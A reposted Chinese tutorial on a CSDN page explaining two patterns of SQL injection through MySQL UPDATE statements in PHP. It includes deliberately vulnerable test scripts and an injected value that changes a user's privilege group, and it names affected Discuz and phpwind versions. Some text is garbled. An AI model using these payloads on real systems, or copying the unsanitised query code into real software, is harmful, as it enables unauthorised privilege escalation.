sql+php修改mysql结构,UPDATE注射(mysql+php)的两个模式(转)

最新推荐文章于 2021-04-15 19:37:10 发布
最新推荐文章于 2021-04-15 19:37:10 发布
阅读量210 收藏
点赞数
文章标签: sql+php修改mysql结构
本文详细介绍了在Windows环境下,通过PHP操作MySQL数据库的两种更新注入模式,分别是变量未加引号(MOD1)和变量加引号(MOD2)的情况。作者通过实例展示了如何利用这些模式在Discuz和phpwind等软件中进行远程exploit。最后,文章感谢了多位朋友的讨论和帮助。
摘要由CSDN通过智能技术生成

UPDATE注射(mysql+php)的两个模式(转)[@more@]

一.测试环境:

OS: Windowsxp sp2

php: php 4.3.10 (

mysql 4.1.9

apache 1.3.33

二.测试数据库结构:

----start---

-- 数据库: `test`

--

-- --------------------------------------------------------

--

-- 表的结构 `userinfo`

--

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--

-- 导出表中的数据 `userinfo`

--

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.测试模式:

1,变量没有带’’或""[MOD1]

//test1.php Mod1

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

到修改groupid的目的:

那么我们提交:

在mysql里查询: mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

2,变量带’’或""[MOD2]

?php

//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

’,groudid=’1 在gpc=on的情况下’变成了’

提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查询:mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user | pass        |

+---------+-------+--------------------+

| 2    | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)

groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result);  //$p的数据写入数据库

$sql= "select pass from userinfo where user=’heige’";

$result = mysql_db_query($dbname, $sql);

$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:’,groudid=’1

回mysql查询下 : mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update--&gtselect--&gtupdate

四.实际模式

模式1:Discuz 2.0/2.2 register.php 注射

漏洞分析:

Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

模式2:phpwind 2.0.2和3.31e 权限提升漏洞    漏洞分析:

update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)

|

v

select (jop.php)

|

v

updtate (jop.php)

Exploit:

五.鸣谢

特别感谢saiy等朋友的讨论和帮助。Thanks!!!

weixin_39966765
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现mysql 的增删改查(菜鸟教程)
weixin_51787697的博客
06-19 545
mysql,菜鸟教程
php+MySQL判断update语句是否执行成功的方法
10-25
判断update语句是否执行成功主要有两个方法:第一种是利用`mysql_query()`函数执行update语句后,通过`mysql_affected_rows()`函数来确认影响的行数;第二种是通过`mysql_error()`函数来捕获错误,判断是否有错误...
mysql_fetch_array取值_用my_fetch_array()从数组结果中提取信息。
weixin_30739835的博客
02-11 195
$bookname=$_POST['text'];$link=mysql_connect("localhost","root","111111") or die("Can't connect database!".mysql_error());$selected=mysql_select_db("test",$link);mysql_query("set names gb2312");$resul...
PHP操作MySQL数据库(连接、增删改操作)----编辑
测试0901-1
07-11 548
MySQL 是跟 PHP 配套使用的最流行的开源数据库系统,我们知道MySQLPHP的最佳搭档,下面是系统的总结PHPMySQL联合使用的方法。主要是使用MySQL扩展,下面就通过归纳总结来提升。 MySQL概述 MySQL 是一种在 Web 上使用的数据库系统。 MySQL 是一种在服务器上运行的数据库系统。 MySQL 不管在小型还是大型应用程序中,都是理想的选择。 MySQL ...
PHP⑴:PHPMYSQL数据库的增、删、改、查操作
dawn0718的专栏
04-15 331
  相比ASP.Net,使用PHP编写Web应用并不轻松,甚至是别扭,但看了网上介绍PHP很强大,也要学习一下。   下面是PHPMYSQL数据库的增、删、改、查的操作。 <?php //PHPMYSQL的增、删、改操作 function MYSQLAddDelUpdate($OP_SQL){ $Link = null; include './config.php'; if(!($Link=mysqli_connect (HOS
mysqlupdate语句怎么设置变量_MySQL数据库update语句使用详解
weixin_42099906的博客
02-18 3522
本篇文章我们来讲讲如何对MySQL数据库进行更新操作,对数据库进行增删改查操作是我们必会的基础之一,会了这个增删改查我们可以在这基础上去编写更多的东西,废话不多说了,我们来看一下本篇文章的内容吧!1、第一种:使用b表数据更新a表update Player as a ,PlayerSet as bset a.role_id=b.set_valuewhere a.role_id=b.set_key2、...
PHP_MYSQL_study.rar_PHP + mysql_php mysql
09-21
在Web开发领域,PHP(Hypertext Preprocessor)和MySQL两个不可或缺的工具。PHP是一种广泛使用的开源脚本语言,尤其适合服务器端的编程,而MySQL则是一款流行的开源关系型数据库管理系统。两者结合,为开发者提供...
pHP_MySQL.zip_php+sql
09-14
rozdzial_14和rozdzial_23可能涵盖了SQL语言基础,如SELECT语句用于查询数据,INSERT、UPDATE和DELETE用于修改数据库中的记录;rozdzial_28可能深入讲解了更复杂的查询技巧,如JOIN操作用于合并多个表的数据。 在...
基于php+bootstrap+mysql自媒体信息发布系统.zip
07-23
开发者可能设计了多个数据库表,并使用SQL语句进行数据操作,如INSERT(插入)、SELECT(查询)、UPDATE(更新)和DELETE(删除)。 【系统】指的是整个信息发布系统,它可能包括用户注册、登录、发布新闻、浏览...
php大批量update,PHP操作MySQL批量Update的写法,各框架通用防注入版
weixin_39669075的博客
03-21 204
使用别人的扩展遇到了问题,发现没有做SQL注入的处理。我又写了个轮子,根据自己需求扩展了下,有需要可以直接取用,仅需写明来源。namespace App\Utils;use Illuminate\Support\Facades\DB;class UpdateBatch{/**** @param string $table 表名* @param array $values 更新字段* @param ...
php修改mysql数据库记录语句怎么写_MySQL_PHP+MySQL教程(8):MySQL UpdateUPDATE 语句用于中修改数据库表 - phpStudy...
weixin_42358409的博客
02-08 200
UPDATE 语句用于中修改数据库表中的数据。更新数据库中的数据UPDATE 语句用于在数据库表中修改数据。语法UPDATE table_nameSET column_name = new_valueWHERE column_name = some_value注释:SQL 对大小写不敏感。UPDATEupdate 等效。为了让 PHP 执行上面的语句,我们必须使用 mysql_query( ...
php判断mysql修改成功_php+MySQL判断update语句是否执行成功的方法
weixin_33603823的博客
02-28 372
update语句是PHP+MySQL中常用的操作,判断update语句是否执行成功是其中非常重要的一个环节。本文就以实例展示了php+MySQL判断update语句是否执行成功的方法。分享给大家供大家参考之用。具体方法如下:代码一:$rs=MySQL_query($sql);if(mysql_affected_rows())echo"sql执行成功";elseecho"sql执行失败";代码二...
update mysql php_PHPMySQL的更新update
weixin_39608478的博客
02-22 80
注意:请注意WHERE子句在更新的语法。 WHERE子句指定的记录或记录,应予以更新。如果你忽略WHERE子句,所有记录将被更新!若要了解更多有关SQL ,请访问我们的SQL教程。为了让PHP来执行上述的声明,我们必须使用mysql_query ( )函数。此功能是用来发送查询或命令的MySQL连接。例如早些时候教程,我们创建了一个表命名为“人” 。下面是它如何期待:FirstNameLastNa...
php mysql 删减增_PHP连接MySQL进行增、删、改、查操作
weixin_35253106的博客
02-02 105
话不多说,请看代码: 代号姓名性别民族生日1.造一个mysqli对象,造连接对象$db = new MySQLi("localhost","用户名","密码","数据库名");2.准备一条SQL语句$sql = "select * from info";3.执行SQL语句,如果是查询语句,成功返回结果集对象$reslut = $db->query($sql);4.判断返回是否执行成功if($...
phpmysql的操作教程_PHP中对MySQL的操作
weixin_33945547的博客
01-19 450
php中支持很多的数据库,但是结合最好的数据库时mysql,他和linux、apache、php共同构成了LAMP系统。在php中支持很多的数据库,但是结合最好的数据库时mysql,他和linux、apache、php共同构成了LAMP系统。phpmysql的操作步骤为:连接mysql数据库-->选择数据库-->执行SQL语句-->关闭结果集-->关闭mysql数据库。...
基于ASP.NET+MVC5+EF6开发企业网站.zip
08-22
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
Steam家庭共享同时玩工具.bat
最新发布
08-22
Steam家庭共享:两个人同时玩同一个游戏
基于Mysql和JAVA的股票交易系统.zip
08-22
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
这个库用于存储及在组内共享《肖像印》项目数据.zip
08-22
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
Windows Server 2012 R2上搭建IIS8.5+PHP5.5.8+MySQL5.6环境指南
为了使PHP能正常工作,需要安装Visual C++ Redistributable for Visual Studio 2012 Update 4,包括x64和x86两个版本,因为它们包含了PHP运行所需的库。同样,为了安装MySQL,需要Microsoft Visual C++ 2010 可再...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值